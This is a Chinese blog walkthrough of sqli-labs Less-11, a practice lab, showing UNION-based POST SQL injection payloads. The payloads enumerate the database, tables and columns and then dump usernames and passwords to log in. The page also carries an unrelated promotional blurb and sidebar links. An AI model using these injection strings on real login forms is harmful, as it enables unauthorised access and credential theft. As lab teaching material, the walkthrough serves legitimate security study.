当前位置:网站首页>sqli-labs(less-11)
sqli-labs(less-11)
2022-08-02 10:50:00 【m0_67401499】
目录
less-11(POST注入)
1.send to Repeater
2.单引号报错
3. 查库名
aadmin’union select user(),database()–
4.查表名
aadmin’union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’–
5.查段名
aadmin’union select 1,group_concat(column_name) from information_schema.columns where table_table=‘users’–
6.查数据
aadmin’union select 1,group_concat(username,‘:’,password) from users –
7.用查到的数据Dumb登录
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。深知大多数初中级java工程师,想要升技能,往往是需要自己摸索成长或是报班学习,但对于培训机构动则近万元的学费,着实压力不小。自己不成体系的自学效率很低又漫长,而且容易碰到天花板技术停止不前。因此我收集了一份《java开发全套学习资料》送给大家,初衷也很简单,就是希望帮助到想自学又不知道该从何学起的朋友,同时减轻大家的负担。添加下方名片,即可获取全套学习资料哦
边栏推荐
猜你喜欢
C#/VB.NET 添加多行多列图片水印到Word文档
使用较广泛的安全测试工具有哪些?
记一次mysql查询慢的优化历程
同样做软件测试,和月收入 3W 的学弟聊了一晚上,我彻底崩溃了
爆款视频怎么做?这里或许有答案!
3年测试在职,月薪还不足2w,最近被裁员,用亲身经历给大家提个醒...
Nanny Level Tutorial: Write Your Own Mobile Apps and Mini Programs (Part 2)
Turning and anti-climbing attack and defense
超赞!发现一个APP逆向神器!
How to choose a truly "easy-to-use, high-performance" remote control software
随机推荐
AlphaFold又放大招,剑指整个生物界!
The 38-year-old daughter is not in love and has no stable job, the old mother is crying
如何选择一块真正“好用的、性能高”的远程控制软件
R language ggplot2 visualization: use the ggbarplot function of the ggpubr package to visualize the horizontal column chart (bar chart), use the orientation parameter to set the column chart to be tra
保姆级教程:写出自己的移动应用和小程序(篇二)
win10打印服务无法启动(运行时错误automation)
Event object, do you know it well?
[Science of Terminology] For those difficult words about the integrated workbench, read this article to understand in seconds!
Spearman's correlation coefficient
The R language uses the ggtexttable function of the ggpubr package to visualize the table data (draw the table directly or add the table data to the image), set the theme parameter to customize the fi
你好,我的新名字叫“铜锁/Tongsuo”
Event 对象,你很了解吗?
wireshark的安装教程(暖气片安装方法图解)
身为程序猿——谷歌浏览器的这些骚操作你真的废吗!【熬夜整理&建议收藏】[通俗易懂]
21 Days Learning Challenge - Day 1 Punch (Screen Density)
全方位剖析Numpy中的np.diag源代码
LayaBox---TypeScript---Mixins
38岁女儿不恋爱没有稳定工作老母亲愁哭
如何封装微信小程序的 wx.request() 请求
LayaBox---TypeScript---Iterator and generator